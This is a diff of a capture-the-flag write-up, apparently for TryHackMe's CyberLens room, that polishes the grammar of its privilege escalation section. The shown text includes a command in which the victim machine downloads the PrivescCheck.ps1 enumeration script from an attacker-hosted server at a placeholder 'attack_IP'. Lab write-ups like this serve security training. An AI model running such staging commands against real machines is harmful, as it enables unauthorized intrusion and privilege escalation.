hanhctf/hanhctf.github.io/_posts/2024-05-20-THM-CyberLens.md

 ## Privilege Escalation

-This tool can find in Github [PrivescCheck.ps1](https://github.com/itm4n/PrivescCheck).
+This tool is available on GitHub [PrivescCheck.ps1](https://github.com/itm4n/PrivescCheck).

-We can use curl to upload PrivescCheck.ps1 to victim via powershell.
+We can use curl to upload PrivescCheck.ps1 to the victim via Powershell.
 In this case.
-I run local server with `python3 -m http.server 80` to host PrivescCheck.ps1 file.
+I run the local server with `python3 -m http.server 80` to host PrivescCheck.ps1 file.
 In victim machine, we get .ps1 via `Invoke-WebRequest -Uri http://attack_IP:port/PrivescCheck.ps1 -Outfile PrivescCheck.ps1`

 Run tools: